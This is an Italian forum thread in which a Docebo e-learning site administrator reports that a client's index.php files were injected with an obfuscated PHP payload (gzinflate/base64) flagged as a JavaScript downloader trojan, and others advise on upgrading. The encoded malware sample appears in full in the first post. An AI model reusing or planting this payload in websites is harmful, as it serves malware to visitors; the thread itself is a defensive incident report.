Files index.php modificati

Installazione, configurazione generale, notifiche, API, lingue, problemi server
Post Reply
coniglio
Newbie
Posts: 18
Joined: Mon Jun 04, 2012 10:05 pm

Files index.php modificati

Post by coniglio »

Buongiorno a tutti,
tre giorni fa nell'installazione docebo di un mio cliente c'è stato un problema.

Tutti i file index sono stati modificati ed è stato inserito il seguente codice:

Code: Select all

#c3284d#
echo(gzinflate(base64_decode("hVTJkpswEP2WcBjAGA0Sw5JolBxc+YIcKR9sLBtqbMASjmtwzb9HK2DXJDlINL28ft1S65WXrO767z17v53Jri0vJ9r0oGR009OfRyr/POfi+PgMNl1Hm92qqo877xw4QvdRbvqy8s5X/1aRMILoOcHDQNyNG7hHF++Ju2dCbMU6ibWqhC4QZrZy8YdMuaWHLSUda/u2f++oBdy+xIcd928Sa/jtAn7Z8p55EMUhRMgPhgFzToq1RPOqp6dh8H+47Y663xwHX0lf1RxTci32YySUQWvckCKMQZwlS/ERewaSZQ5yJUntV5AiqZF7ZmSlTpaRFnK1KwNE2qIdo2UYKRUC1pgB65yp/zluCIUlnuxSRNqiMuUKWi2hl/gqdWQIPO6GnWZs4uaJJ0nVOoboxLoFmp7NEGe2Olun1ulMkp9hKioxqI81zutJgKWazwCtp+I6wulE2dQey8+uh0rmeSzd1OTQoSP0v44km1IZjzt6d6cDsk+gbavt6efW856gLu7ucn3WhXx0mqEp7zkcfOjc1OHMdDj/mz/Smz3y/99ZFWBuub3rZpbGkRIz2TKvJmmIQigXrkOYpl9IhOsg8G9vpJazy3nwq2d1cyicPWtPTuCsKvEsiBl21l4IFy+LauElAVw0xdvaFy8N9TgXn9dn82D9AQ==")));
#/c3284d#
gli utenti windows, si vedevano bloccare l'accesso e vedevano la segnalazione di un virus nella pagina.

URL: http://fad.XXXXXXXXXX.it/index.php
Processo: C:\Programmi\Internet Explorer\iexplore....
Infezione: JS:Downloader-BNY [Trj]

Ho chiaramente controllato tutti i file e cancellato le tracce del problema. Dopo la pulizia manuale è tornato tutto normale ed anche la segnalazione di infezione è scomparsa.

Ora però vorrei mettere in sicurezza l'installazione, come mi consigliate di procedere?

la versione è la 3.6.0.2

Grazie mille
Paolo
User avatar
alberto
FormaLms Guru
Posts: 1134
Joined: Fri Mar 02, 2012 9:18 am
Contact:

Re: Files index.php modificati

Post by alberto »

Ciao, ti consiglio di aggiornare almeno alla 3605, che se non sbaglio tra le altre cose chiudeva anche qualche bug di siccurezza, non so se già presente nella tua versione. Se puoi aggiorna anche alla 405 in modo da allinearti ai fix rilasciati dalla community.
Trovi i pacchetti di installazione qui: http://sourceforge.net/projects/doceboreborn/

In bocca al lupo!
coniglio
Newbie
Posts: 18
Joined: Mon Jun 04, 2012 10:05 pm

Re: Files index.php modificati

Post by coniglio »

Grazie mille delle informazioni.

Cercherò, parlandone con il cliente, di portare la piattaforma alla 405.

facendo l'aggiornamento, mi crea problemi sul template grafici?
I settaggi dei corsi, modalità di iscrizione, archivi ecc... subiranno dei cambiamenti?

Grazie mille ancora
Paolo
User avatar
alberto
FormaLms Guru
Posts: 1134
Joined: Fri Mar 02, 2012 9:18 am
Contact:

Re: Files index.php modificati

Post by alberto »

I template della 3.6 NON sono compatibili con la 4, ma la gestione template nella versione 4 è stata molto migliorata e semplificata: ora usa un unico template per LMS e Core, molti fogli di stile sono stati accorpati, è possibile assegnare template diversi a nodi diversi dell'organigramma utenti, l'aspetto in generale è molto più moderno e "corporate".
Se non hai aggiunto modifiche funzionali sul template dovresti riuscire ad adeguarlo senza problemi con poco CSS.

Per quanto riguarda settaggi dei corsi e iscrizioni degli utenti negli upgrade che ho fatto finora non ho ancora riscontrato problemi.

In questi giorni abbiamo riscontrato un problemino con la gestione dei permessi degli amministratori pubblici e lo stiamo verificando, per il resto ad oggi sembra tutto ok.
coniglio
Newbie
Posts: 18
Joined: Mon Jun 04, 2012 10:05 pm

Re: Files index.php modificati

Post by coniglio »

Perfetto, grazie mille delle informazioni.
Post Reply